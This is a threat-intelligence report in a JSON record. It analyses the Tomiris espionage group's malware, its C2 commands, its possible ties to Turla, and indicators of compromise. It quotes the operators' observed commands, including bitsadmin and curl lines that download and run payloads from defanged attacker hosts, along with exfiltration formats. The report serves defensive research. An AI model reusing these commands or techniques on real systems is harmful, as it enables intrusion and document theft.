{ "id": "e50f4f42-24a7-4d20-892d-c6b064804e0a", "created_at": "2026-04-06T00:06:28.789727Z", "updated_at": "2026-04-10T03:37:33.014561Z", "deleted_at": null, "sha1_hash": "efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9", "title": "Tomiris called, they want their Turla malware back", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 230346, "plain_text": "Tomiris called, they want their Turla malware back\r\nBy Pierre Delcher\r\nPublished: 2023-04-24 · Archived: 2026-04-05 15:30:35 UTC\r\nIntroduction\r\nWe introduced Tomiris to the world in September 2021, following our investigation of a DNS-hijack against a\r\ngovernment organization in the Commonwealth of Independent States (CIS). Our initial report described links\r\nbetween a Tomiris Golang implant and SUNSHUTTLE (which has been associated to\r\nNOBELIUM/APT29/TheDukes) as well as Kazuar (which has been associated to Turla); however, interpreting\r\nthese connections proved difficult.\r\nWe continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023,\r\nand our telemetry allowed us to shed light on the group. In this blog post, we’re excited to share what we now\r\nknow of Tomiris with the broader community, and discuss further evidence of a possible connection to Turla.\r\nActor profile\r\nTomiris focuses on intelligence gathering in Central Asia. Tomiris’s endgame consistently appears to be the\r\nregular theft of internal documents.\r\nThe threat actor targets government and diplomatic entities in the CIS. The occasional victims discovered\r\nin other regions (such as the Middle East or South-East Asia) turn out to be foreign representations of CIS\r\ncountries, illustrating Tomiris’s narrow focus.\r\nIt is characterized by its tendency to develop numerous low-sophistication “burner” implants in a variety of\r\nprogramming languages that are repeatedly deployed against the same targets, using elementary but\r\nefficient packaging and distribution techniques. Tomiris occasionally leverages commercial or open-source\r\nRATs.\r\nLanguage artifacts discovered in Tomiris’s implant families and infrastructure from distinct campaigns all\r\nindicate that the threat actor is Russian-speaking.\r\nOverall, Tomiris is a very agile and determined actor, open to experimentation – for instance with delivery\r\nmethods (DNS hijacking) or command and control (C2) channels (Telegram).\r\nThe following map shows the countries where we detected Tomiris targets (colored in green: Afghanistan and CIS\r\nmembers or ratifiers). It is worth noting that while we identified a few targets in other locations, all of them appear\r\nto be foreign diplomatic entities of the colored countries:\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 1 of 17\n\nTomiris uses a wide variety of malware implants developed at a rapid pace and in all programming languages\r\nimaginable. We hypothesize that the general aim is to provide operators with “full-spectrum malware” in order to\r\nevade security products. In fact, on several occasions we observed the actor persistently cycling through available\r\nmalware strains until one of them was finally allowed to run on victim machines.\r\nTools used by Tomiris fall into three categories:\r\nDownloaders, rudimentary malicious programs whose role is to deploy a backdoor or required additional\r\nlegitimate tools.\r\nBackdoors, whose feature set is typically limited to reconnaissance, command execution, file download\r\nand file upload.\r\nFile stealers specifically built to exfiltrate documents, often relying on a hardcoded list of file extensions to\r\nautomatically find recently edited files and upload them to a C2. Some file stealers are backdoor variants\r\nand share the same code base.\r\nTomiris goes after its victims using a wide variety of attack vectors: spear-phishing emails with malicious content\r\nattached (password-protected archives, malicious documents, weaponized LNKs), DNS hijacking, exploitation of\r\nvulnerabilities (specifically ProxyLogon), suspected drive-by downloads and other “creative” methods (see details\r\nof the investigation described below). The following table lists all Tomiris malware families we are aware of:\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 2 of 17\n\nName Type Language Comments\r\nTomiris\r\nDownloader\r\nDownloader C\r\nMentioned in our original blog post.\r\nSome samples contain traces of Russian language.\r\nTomiris (Golang\r\nimplant)\r\nBackdoor Golang Described in our original blog post.\r\nSBZ[1] filestealer File stealer Golang\r\nDocument stealer based on Tomiris’s (Golang implant)\r\nsource code.\r\nTomiris download\r\nscheduler\r\nDownloader C\r\nA variant of Tomiris Downloader that additionally uses\r\nscheduled tasks to download a payload.\r\nTomiris .NET\r\ndownloader\r\nDownloader .NET\r\nA .NET variant of Tomiris Downloader, mainly used to\r\ndeploy required legitimate tools, such as WinSCP.\r\nTelemiris Backdoor Python Contains traces of Russian language.\r\nRoopy File stealer Pascal Similar to SBZ filestealer (see above).\r\nJLORAT Backdoor Rust Various traces of Russian language in this family.\r\nJLOGRAB File stealer Rust Based on JLORAT’s source code.\r\nIn addition, Tomiris leveraged open-source or commercially available implants and offensive tools. Notably, the\r\nlatter were associated with Tomiris because they were downloaded from Tomiris downloader, shared a common\r\nC2 with other Tomiris implants, and/or were leveraged to deploy other Tomiris implants:\r\nName Description\r\nRATel\r\nOpen-source RAT available on GitHub.\r\nOne of the samples (MD5 10B315FB7D8BA8D69337F04ED3891E75) that we attributed\r\nto Tomiris was downloaded from mail.mfa.uz.webmails[.]info, which has been referenced\r\nby Cyjax.\r\nPython\r\nMeterpreter\r\nloader\r\nMetasploit-provided Python script that is leveraged to deploy a Meterpreter instance in\r\nmemory. These are frequently packed using py2exe, PyInstaller or Nuitka.\r\nWarzone RAT A commercial C++ RAT.\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 3 of 17\n\nRelationships between Tomiris tools. Arrows indicate direct execution.\r\nOverall, pieces from the Tomiris toolset appear to be generally interchangeable and don’t appear to be tied to\r\nspecific campaigns or victims. Operators routinely mix and match the various families, trying to deploy tools\r\n(often repeatedly) with little regard for stealth until one doesn’t get caught by antivirus software.\r\nThe following paragraphs provide a summary description of the main malware strains used by Tomiris.\r\nTelemiris\r\nTelemiris is a Python backdoor originally packed with PyInstaller (we later identified some Nuitka-packaged\r\nsamples as well). Its name derives from the fact that it uses Telegram as a C2 channel. After setting up persistence\r\n(copying itself under %AppData%/service/ and creating a RUN key entry), the malware enters its main loop\r\nwhere it waits for Telegram messages and replies to them. Supported commands are:\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 4 of 17\n\n/run\r\nExecute an arbitrary command on the victim’s machine. It’s worth noting that command\r\nresults are expected to be encoded in Cyrillic codepage.\r\n/download\r\n\u003cpath\u003e\r\nSends the contents of the file stored on the victim’s machine at the given path.\r\n[file\r\nattachment]\r\nWrites the received file on the victim’s machine at the path specified in the attachment’s\r\ncaption, or in the current directory by default. Telemiris replies with “Файл загружен!”\r\n(“File downloaded!”).\r\nFrom what we observed, Telemiris is used as a first-stage implant that operators use to deploy other tools such as\r\nRoopy, JLORAT, or even the legitimate WinSCP binary, to further exfiltrate files.\r\nRoopy\r\nWritten in Pascal, this file stealer crawls the victim’s filesystem at regular intervals and uploads all files of interest\r\nto its C2 server. At startup, it wastes CPU cycles on dead code and useless loops, which we assume are for evasion\r\npurposes. Roopy then creates its working directory (%AppData%/Microsoft/OneDrive) where it stores the list of\r\nalready uploaded files (as upload.dat) and a copy of documents waiting to be uploaded (in the backup subfolder).\r\nThen, every 40-80 minutes, Roopy crawls C:\\Users and all other drives (D:, E:, …), looks for all documents (.doc,\r\n.docx, .xls, .xlsx, .txt, .pdf) modified in the last month, and stages them for upload. Discovered files are collected\r\nin ZIP archives up to 5MB in size and sent to the C2 server over plain HTTP using POST requests containing such\r\ndata as:\r\n{\r\n\"n\":\"[timestamp]_[part].zip\",\r\n\"t\":\"[computer name]\",\r\n\"s\": \"[timestamp]\",\r\n\"b64\":\"[base64-encoded zip file]\"\r\n}\r\nThis data format, naming convention as well as the URL scheme used by the C2 server (i.e., /h/pa) are very\r\nsimilar to SBZ filestealer. We identified a number of variants of Roopy where logging can be either enabled or\r\ndisabled by default, or where the base64 encoding scheme was replaced by a simple subtraction from the bytes of\r\nthe obfuscated data.\r\nJLORAT\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 5 of 17\n\nOur first sightings of this Rust malware date back to August 2022. Similar to Telemiris, JLORAT copies itself\r\nunder %AppData% and sets up persistence via a registry RUN key. It also creates a mutex to ensure atomic\r\nexecution (“whatever”, as in the default usage example for the “single-instance” Rust library that is embedded).\r\nThe backdoor starts by gathering information on the victim machine, such as the system information, current user\r\nand public IP address. The information is sent via an HTTP POST request to the C2 on a non-standard port (i.e.,\r\n9942). Sample data sent by the C2 could be:\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 6 of 17\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n{\r\n\"admin\": true,\r\n\"cmd\": \"\",\r\n\"cpu_vendor\": {\r\n\"brand\": \"[REDACTED]\",\r\n\"cores\": 6,\r\n\"cpu_usage\": 0,\r\n\"frequency\": 2400,\r\n\"name\": \"CPU 6\",\r\n\"vendor_id\": \"[REDACTED]\"\r\n},\r\n\"hwid\": \"[REDACTED]\",\r\n\"ip\": \"[REDACTED]\",\r\n\"memory\": \"32.0\",\r\n\"resolution\": \"1280x1024\",\r\n\"software\": [\r\n\"Microsoft Visual C++ 2005 Redistributable (x64)\",\r\n\"[REDACTED, list of further installed software items]\"\r\n],\r\n\"username\": \"[REDACTED]\",\r\n\"version\": \"Windows 7 Professional\"\r\n}\r\nJLORAT then looks for specific keywords in the data returned by the C2 to start processing orders.\r\n0 No operation\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 7 of 17\n\ncmd|[command]\r\nExecutes the specified command, and returns the result in the cmd key of the JSON\r\nresponse. Some specific subcommands are processed by JLORAT directly and not\r\npassed to the command prompt, such as cmd|cd (change working directory), cmd|ls or\r\ncmd|dir (lists file in the current directory) and cmd|curfile (returns the path to the\r\nJLORAT binary).\r\nupload|path Sends the designated file from the victim to the C2, on TCP port 9999.\r\ndownload|url|path Saves the file at the given URL to the provided path on the victim’s machine.\r\nscreen Takes a screenshot and sends it to the C2 on TCP port 9999.\r\nData sent to port 9999 is not passed in a JSON dictionary, but instead follows a specific format:\r\nOffset Field name Description\r\n0 FILENAME_LEN Length of the filename of the data being sent\r\n4 FILENAME Name of the file being sent\r\n4 + FILENAME_LEN CONTENT_LEN Length of the data\r\n8 + FILENAME_LEN CONTENT Payload\r\nWe also discovered variants of JLORAT bundled with additional modules – effectively turning it into a file stealer\r\nwe call JLOGRAB. Just like Roopy, JLOGRAB:\r\nPeriodically looks for documents (a combination of.txt, .pdf, .xml, .xlsx, .doc and .docx files depending on\r\nthe sample)\r\nSaves the list as %AppData%/temp_id.txt\r\nCopies discovered documents under %AppData%/transport\r\nUploads them to the C2 in ZIP archives.\r\nJLORAT contains traces of Russian language in status messages (“Директория установлена!”, meaning\r\n“Directory set”). The source binary also contains metadata indicating some of the source code is stored in a\r\n“moduls” folder, which appears to be a misspelling of the English word “modules”, or a poor transliteration of the\r\nRussian word “модуль” (pronounced: modul’).\r\nTomiris’s deployment spree: TunnusSched giveaway\r\nOn January 5, 2023, Mandiant released a blog post describing attacks against Ukrainian entities that they\r\nattributed to Turla. Let’s start by briefly summing up their findings:\r\nIn September 2022, a threat actor purchased an expired domain name (anam0rph[.]su) that used to be part\r\nof a botnet (Andromeda) infrastructure. This allowed them to receive incoming connections from previous,\r\ndormant infections and take over a number of machines.\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 8 of 17\n\nVictims in Ukraine were infected with KopiLuwak and QUIETCANARY, two malware strains previously\r\nassociated with Turla.\r\nWhile publicly available data indeed shows that anam0rph[.]su was re-registered on August 12, 2022, we couldn’t\r\nfind any link between Andromeda and KopiLuwak from our telemetry. Nevertheless, we had been tracking\r\nQUIETCANARY since 2019 under the name “TunnusSched” (not “Tunnus” as Mandiant’s reporting indicates),\r\nand decided to take a closer look at samples collected during the same period.\r\nTo our great surprise, we discovered one TunnusSched/QUIETCANARY sample (MD5\r\nB38160FC836AD42F1753A0873C844925) had been delivered to a government target in the CIS on September\r\n13, 2022. Our telemetry additionally shows that this TunnusSched malware was deployed…from Tomiris’s\r\nTelemiris (MD5 C49DBF390E876E926A338EA07AC5D4A7).\r\nMore precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known\r\nTomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy. These efforts were\r\nthwarted by security products, which led the attacker to make repeated attempts, from various locations on the\r\nfilesystem:\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 9 of 17\n\n$\u003e bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar\r\n[REDACTED]\\lsasss.rar\r\n$\u003e rar.exe x \"[REDACTED]\\lsasss.rar\" \"[REDACTED]\\\"\r\n$\u003e [REDACTED]\\lsasss.exe\r\n$\u003e dir \"[REDACTED]\\\r\n$\u003e del \"[REDACTED]\\document.rar\"\r\n$\u003e [...]\r\n$\u003e wmic list drives\r\n$\u003e wmic diskdrive get name\r\n$\u003e wmic logicaldisk where drivetype=5 get deviceid, volumename, description\r\n$\u003e wmic logicaldisk where drivetype=3 get deviceid, volumename, description\r\n$\u003e [...]\r\n$\u003e bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar F:\\lsasss.rar\r\n$\u003e rar.exe x \"F:\\lsasss.rar\" \"F:\\\"\r\n$\u003e F:\\lsass.exe\r\n$\u003e tasklist | findstr /I \"lsasss\"\r\nAll these attempts ended in failure. After a one-hour pause, the operator tried again at 07:19 UTC, this time using\r\na TunnusSched/QUIETCANARY sample:\r\ncurl hxxps://crane[.]mn/wp-content/plugins/jetpack/modules/photon-cdn/EpsonDeviceControl.exe –output\r\n[REDACTED]\\epsondevicecontrol.exe\r\nThe TunnusSched sample was blocked as well, and the operator resumed trying to deploy JLORAT and Roopy\r\nsamples up to the next day. This activity and brute-force approach to infection is completely consistent with other\r\nTomiris infections we have observed in the past.\r\nAttribution: reading KopiLuwak’s story again\r\nMandiant noted that some elements of the recent TunnuSched case they analyzed “appear to be a departure from\r\nhistorical Turla operations”, but the use of KopiLuwak and TunnusSched led them to link this activity to Turla\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 10 of 17\n\nanyway. In order to perform a critical analysis of this attribution process, we need to go back in time.\r\nKopiLuwak has belonged to Turla\r\nKaspersky first reported on KopiLuwak in 2016. Back then, this JavaScript reconnaissance tool was used to\r\ndeploy ICEDCOFFEE in countries like Greece, Romania and Qatar. We attributed the associated attack campaign\r\nto Turla and could not find any reason to believe that was incorrect.\r\nTunnusSched and KopiLuwak are part of the same toolset\r\nStarting from 2019, we discovered additional implant families that were linked to KopiLuwak (and so, to Turla),\r\nstarting from 2019. The implants were additionally linked together, mainly because they leverage an identical RC4\r\nimplementation:\r\nMalware name Links to Turla\r\nTopinambour\r\nDelivered KopiLuwak samples\r\nShared TTPs (use of compromised WordPress sites)\r\nSame RC4 implementation as Tunnus and TunnusSched\r\nTunnus\r\nFound on machines infected with KopiLuwak\r\nShared TTPs (use of compromised WordPress sites)\r\nSame RC4 implementation as TunnusSched and Topinambour\r\nTunnusSched\r\n(QUIETCANARY)\r\nShared PDB path with Tunnus\r\nSame RC4 implementation as Tunnus and Topinambour\r\nRocketMan\r\nFound on machines infected with Topinambour\r\nCode similarities with TunnusSched\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 11 of 17\n\nCode similarity between Topinambour (left) and TunnusSched (right)\r\nThe RC4 implementation in these samples results in strictly identical .NET bytecode that, as far as we could\r\nverify, is unique to Tunnus, TunnusSched and Topinambour.\r\nThe fact that all these implants are interconnected leaves little doubt, and Topinambour at least is strongly linked\r\nwith KopiLuwak. As a result, we (still) believe with high confidence that TunnusSched and KopiLuwak are\r\nboth part of similar toolsets, starting from 2019 at the latest.\r\nMandiant’s recent findings also confirm that KopiLuwak and TunnusSched were still part of the same toolset\r\nas of September 2022, as they were both deployed against targets in Ukraine during a single operation.\r\nBut Tomiris uses TunnusSched\r\nAs we recently discovered (and detailed in “Tomiris’s deployment spree: TunnusSched giveaway”), TunnusSched\r\nwas leveraged by Tomiris against a government target in the CIS in September 2022.\r\nAdditionally, we believe with medium confidence the TunnusSched usage described by Mandiant to be part\r\nof Tomiris’s operations, because:\r\nThe TunnusSched sample that was leveraged by Tomiris (MD5\r\nB38160FC836AD42F1753A0873C844925) is very similar to the one that was deployed from KopiLuwak\r\nas per Mandiant’s reporting (MD5 403876977DFB4AB2E2C15AD4B29423FF). Most notably, they share\r\nidentical RC4 encryption keys, user agent strings, unused code (the “ServerInfoExtractor” class), PDB root\r\npath (“c:\\Users\\Scott\\source\\repos\\Kapushka.Client\\BrowserTelemetry\\obj\\Release\\”, starting with a\r\nlowercase “c:”), both have explicit references to VisualStudio 15.7, and a compilation date set to\r\nSeptember 2022.\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 12 of 17\n\nThe TunnusSched sample used by Tomiris and the one referenced by Mandiant were both (only) deployed\r\nagainst targets in the CIS during the same timeframe (September 2022).\r\nThe TunnusSched deployment described by Mandiant involved taking over an extinct Andromeda C2\r\ndomain. We first introduced Tomiris as a threat actor who took over legitimate government hostnames to\r\ndeploy the Tomiris Golang implant, and it has continued to do so. As a result, we believe it is likely Tomiris\r\nmay have hijacked extinct Andromeda hostnames or domains.\r\nSo Tomiris uses KopiLuwak!\r\nAs we have already established, TunnusSched and KopiLuwak are part of similar toolsets (starting from 2019 at\r\nleast). They were also used together during the same operation in September 2022 in the CIS, while TunnusSched\r\nwas also deployed separately by Tomiris in the CIS – both independently analyzed cases leveraging very similar\r\nTunnusSched samples.\r\nAs a result, we believe with medium-to-high confidence that both TunnusSched and KopiLuwak are being\r\nleveraged by Tomiris. Additionally, we cannot rule out Tomiris having used KopiLuwak as early as 2019,\r\nconducting operations that may have been wrongly attributed to Turla back then.\r\nWait: wouldn’t that mean Tomiris IS Turla?\r\nThis entire discussion would be moot if we believed Tomiris to be (a sub-cluster of) Turla – but this is not the\r\ncase. While our initial blog post introducing Tomiris noted similarities with malware used in the Sunburst attack,\r\nwe continued to track the two sets of activity separately. Years later, we are convinced that despite possible ties\r\nbetween the two groups, Turla and Tomiris are separate actors. Tomiris is undoubtedly Russian-speaking, but\r\nits targeting and tradecrafts are significantly at odds with what we have observed for Turla. In addition, Tomiris’s\r\ngeneral approach to intrusion and limited interest in stealth are significantly at odds with documented Turla\r\ntradecraft.\r\nIt follows that two groups (that we know of) may have used KopiLuwak at different points in time. What are the\r\npossible explanations for this?\r\nIt is possible that Turla doesn’t mind using a tool that was burned in 2016 and is still using it in current\r\noperations along with new tools.\r\nGiven that KopiLuwak, Tunnus, TunnusSched, etc. are written in JavaScript and .NET, where the source\r\ncode is essentially provided with the malware, other threat actors may have repurposed these tools and are\r\nusing them under a false flag.\r\nTurla shares tool and expertise with Tomiris, or cooperates with Tomiris on joint operations. In this\r\nscenario, it might be acceptable for Turla to give away burned tools, or to use old implants that will not\r\ndisclose current capabilities to their partners.\r\nTomiris and Turla rely on a common supplier that provides offensive capabilities. Or maybe Tomiris\r\ninitially started out as a private outfit writing tools for Turla and is now branching out into the mercenary\r\nbusiness. If so, it is entirely possible that Tomiris, using the toolset it developed for Turla, is conducting\r\noperations for different customers.\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 13 of 17\n\nOur assessment is that the first two hypotheses are the least likely and that there exists a form of deliberate\r\ncooperation between Tomiris and Turla. Its exact nature is, however, hard to determine with the information we\r\nhave at hand. In any case, depending on when Tomiris started using KopiLuwak, a number of campaigns and tools\r\nbelieved to be linked to Turla may in fact need to be re-evaluated.\r\nNot only Topinambour, Tunnus, TunnusSched (QUIETCANARY) and RocketMan may have been used by\r\nTomiris in the past (we know this is the case for TunnusSched, and very likely for Tunnus due to the discovery of\r\ngovernment victims in Russia in 2019), it could also be the case that these tools are Tomiris’s exclusive property.\r\nLooking back, we cannot help but notice that all of these tools were predominantly used in the CIS region, which\r\nis consistent with Tomiris’s traditional victimology.\r\nConclusion\r\nWith this report, we hope to alert the community to the dangers of using KopiLuwak and TunnusSched to link\r\ncyberattacks to Turla. To the best of our knowledge, this toolset is currently shared between Tomiris and Turla and\r\nwe cannot rule out that more actors outside our purview have access to it. We expect the attribution of this cluster\r\nof activities to remain unclear for the near future.\r\nIn the grander scheme of things, this investigation reveals the pitfalls that the information security industry faces\r\nwhen working on cyberattacks. We rely on a knowledge pool generously shared among all participants, yet\r\ninformation decays: what is true today may turn out to be wrong tomorrow. Discovering new, reliable data isn’t\r\nenough; existing assumptions also need to be substantiated – which can only happen when vendors publish data.\r\nIn that spirit, we kindly thank Mandiant for the research they published.\r\nFinally, this investigation illustrates the limits of technical attribution. Looking at infections and malware samples\r\nonly gets us so far and we are often reminded that APT groups are subject to organizational and political\r\nconstraints. On rare occasions, we stumble upon a piece of the puzzle that allows us to pierce the veil.\r\nAs for the Tomiris mystery, we’ll be eagerly awaiting the next piece.\r\nIndicators of compromise\r\nTelemiris\r\nMD5 edb0c08f8b6bb179b4395d8a95619d07\r\nSHA-1 f8d87d5b251671af624c3eaf7ac5cc42a0acadd0\r\nSHA-256 00466d76832193b3f8be186d00e48005b460d6895798a67bc1c21e4655cb2e62\r\nMD5 c49dbf390e876e926a338ea07ac5d4a7\r\nSHA-1 bc9314760071a4aef12e503104478059808e7047\r\nSHA-256 df75defc7bde078faefcb2c1c32f16c141337a1583bd0bc14f6d93c135d34289\r\nMD5 485a08c6ff6a8b05fab42facc0225035\r\nSHA-1 da6635def86b50a5de25f148426f68d3d8ab450a\r\nSHA-256 fd7fe71185a70f281545a815fce9837453450bb29031954dd2301fe4da99250d\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 14 of 17\n\nTomiris Golang implant\r\nMD5 6b567779bbc95b9e151c6a6132606dfe\r\nSHA-1 a0de69ab52dc997ff19a18b7a6827e2beeac63bc\r\nSHA-256 80721e6b2d6168cf17b41d2f1ab0f1e6e3bf4db585754109f3b7ff9931ae9e5b\r\nSBZ filestealer\r\nMD5 51aa89452a9e57f646ab64be6217788e\r\nSHA-1 0b6e1df37ba89d3d35b4b18afc0ffeb46644ff76\r\nSHA-256 cb78495bee37e768ef4566aa1c2cfb5478bae779127430f90c3da75e407350b8\r\nMD5 20c9ca66d2844edb94a623e77accaa5f\r\nSHA-1 752678274224bf9fef83843e44820f6bcd738758\r\nSHA-256 0767806f5734dca1553cae6a835c24a6d92abd678928b64f70dbd8811ed44aca\r\nTunnusSched\r\nMD5 5d6b920fd8f3b5a3a8c9dead25e3a255\r\nSHA-1 902b27a5fd2e5f17e5340e350afa037549ce9faa\r\nSHA-256 0fc624aa9656a8bc21731bfc47fd7780da38a7e8ad7baf1529ccd70a5bb07852\r\nMD5 4452290e674ab521fa0941d45cc6b22f\r\nSHA-1 459b17c42017cfdfc7eb804b5c0ee52aa6035d78\r\nSHA-256 3f94b20cb7f4ff55207660649ebbb02679c991fe03efbcb0bd3840fc7f0bd527\r\nMD5 e59752ffc116388dd863fc2e30e4aaea\r\nSHA-1 98059a86b681b0b8a09a95def3ef874c531b1d66\r\nSHA-256 29314f3cd73b81eda7bd90c66f659235e6bb900e499c9cc7057d10a9083a0b94\r\nTopinambour\r\nMD5 47870ff98164155f088062c95c448783\r\nSHA-1 15e710a107830b193124a6d2bbc785b9383262a9\r\nSHA-256 009406c1c7c0b289a25d44dfaa8364633d9b71df5f3c7a65deec1ef00a8c2ebb\r\nRocketMan\r\nMD5 a80bbd753c07512b31ab04bd5e3324c2\r\nSHA-1 7bb6e4a1ede35867ce5c57b5668f6aacae025b81\r\nSHA-256 046f11a6c561e46e6bf199ab7f50e74a4d2aaead68cdbd6ce44b37b5b4964758\r\nTunnus\r\nMD5 9be1cccd8e6ff0bd2ad7868a7c1308c0\r\nSHA-1 0be035e2d7180a908566a6bdaa907ed74b08b790\r\nSHA-256 85295ab44d0903a2cf4cbdcae55129a40cf5f7fb7210a304fa91a86929fd2cd9\r\nRoopy\r\nMD5 66357e47bbc2ec5694e2c5de9cc3b9c6\r\nSHA-1 ce9db7dbf3368757c232aa960bbfa7b83278618d\r\nSHA-256 0dfbc54a5a88f27e52807873c20872bc6bf92b822de90545492081c4e4f96778\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 15 of 17\n\nMD5 d3e1043cf5382e97685340760c9d3d61\r\nSHA-1 90f1e9fb5845f985cd0995c75e0746a8e47cf8e9\r\nSHA-256 9c086f242120be7a9e57e06b75d8ef6f051a77c6339deaeb574e80ee69590111\r\nMD5 0f092bfc9f9adaf93750df4ae3cdc0f7\r\nSHA-1 e2f191b251ba5c57cdbb5a6d3bfab57957900fcf\r\nSHA-256 a4ea3462bd5aedccc783d18d24589018c257b2a6e092164c01de067a8e3cd649\r\nJLORAT\r\nMD5 8674100d43231294b6562717a9ab3a07\r\nSHA-1 f918e5f50bb3b73a732bc9cb3595bff2ea7b761f\r\nSHA-256 296599df29f4ffa9bf753ff9440032d912969d0bab6e3208ab88b350f9a83605\r\nMD5 d09f792e5ea9f1239f3454fd1ce7893c\r\nSHA-1 9902917a3af585e695141caf347a2f19a065a7df\r\nSHA-256 69bb729ff354cd9651f99a05f74f3ea20d483dc8e6e5838e4dd48858fd500d29\r\nTomiris Downloader\r\nMD5 fd59dd7bb54210a99c1ed677bbfc03a8\r\nSHA-1 292c3602eb0213c9a0123fdaae522830de3fad95\r\nSHA-256 c9db4f661a86286ad47ad92dfb544b702dca8ffe1641e276b42bec4cde7ba9b4\r\nMD5 bcd52718195416b47c3538a89b62c305\r\nSHA-1 5a368354696d06319a050071f48bc6767d92b49a\r\nSHA-256 8391c182588b79697337e401a6424c12b3d707c00c15a17ec59059deedb0e2c4\r\nMD5 daf4f59224cc7c5e94c924f43a76f300\r\nSHA-1 6161aa9d9888472647a9792eead944bfc678c920\r\nSHA-256 8ec159179d49b44849febe7ed522c8fb836d5658ef868db41d2181fb4b1cbd3f\r\nMD5 d1986646b9be824414845f8e98c7961b\r\nSHA-1 98f1a215cd87e08d33f0d2ba13020661e629c6b8\r\nSHA-256 b144229fb62799aa23537eaf0ce267b1445a182c28f4679e8f8234eeb5e603f3\r\nMD5 45a857603e0e72174452fd073ad373de\r\nSHA-1 c1b7547da13b7c78cd6c5c354af945b2eff767c9\r\nSHA-256 e2d4d030542a44a8d4cc8b97da7b26487570dda432a736766dd2ab6d57a3b787\r\nTomiris .NET Downloader\r\nMD5 11ed3f8c1a8fce3794b650bbdf09c265\r\nSHA-1 4040bb7e4ebc98c22bda98680b207ec89767b759\r\nSHA-256 4f237b5aa3ff4fc4e3014f693c27a1cba94fc24f3a6054c28d090592343c06a2\r\nMD5 92c6d7fb1118d2e276dd4ad878db37f6\r\nSHA-1 53baccf15963dc85447cc822ec95ef8ed0326ac6\r\nSHA-256 358411a3b4a327805d629612b1b64357efe5389e56ddae9128ababbc8a2357a1\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 16 of 17\n\nMD5 796c232286743b95fed38d9d5c74f879\r\nSHA-1 cac58134db8bb3c6b0d8f21957cadb9110fa3727\r\nSHA-256 65da1696d36da254779a028b881a1890b0b037e7eee8ea0a9446c8bb0729c1cf\r\nTomiris Download Scheduler\r\nMD5 956cefc9a1759078ccf75b192db10ced\r\nSHA-1 245b78c615c57abaf46235f184a727587c882b69\r\nSHA-256 c5a9be4055e5f00bf3f2e6c57ba1b796157a74406657fd554d69491868cd5925\r\nMD5 67340dba1c379a84df88e639608de310\r\nSHA-1 aa494696a413b652e667cbbb7ccee35a68b45c87\r\nSHA-256 5e66256adbf973f6ab2252c14d6f0d8da2d326f52f6433bcf3a7cd7c60ae8f01\r\nRATel\r\nMD5 d83b31fe5f0144468aad4619c2418ac8\r\nSHA-1 23f388aced4b1732744cbd5fca1a24b8a82c01a9\r\nSHA-256 e152322530819d196fb411a0cb12cf4bcc94975b400a17b95f0fc2e28f6493e5\r\nMD5 447cf4a077f17096ca16a29333b7a046\r\nSHA-1 4a572e67a799ebbb2b9d7260aedb780e3005be51\r\nSHA-256 352f9cd4c14c1002d6c8d902cbca4e96d03a8bb243b33dd192a2260fe66091a1\r\nMD5 10b315fb7d8ba8d69337f04ed3891e75\r\nSHA-1 c56991857a9c09e25f3dd56066b4a322cc5c03d9\r\nSHA-256 4c8eddeab2d40178712685d09da5187b996389fba62c7f9b9635b07060b1e013\r\nPacked Python Meterpreter loader\r\nMD5 322837acdcedc952587e7be9886ddffd\r\nSHA-1 19357154ff3e43c968fd09f61db1e6e8084384fa\r\nSHA-256 98275bfe968d5998230bdf18de1be795b5ad42bd82b5ecb1405b00afba6f533d\r\nMD5 778d491e9742199b558e84a27c559612\r\nSHA-1 66271b2536481a6b2a3ae21412ce5ef50a692cfa\r\nSHA-256 9cd10a2d9db9cf1c5b3454c323fd148f5a322b4100f35e0a73ed4632038631cc\r\n[1]\r\n Name is directly extracted from strings in binary samples. Despite similarity to the “STAITBIZARRE” implant\r\n(also sometimes called “SBZ”), it is completely unrelated.\r\nSource: https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "references": [ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/" ], "report_names": [ "109552" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret 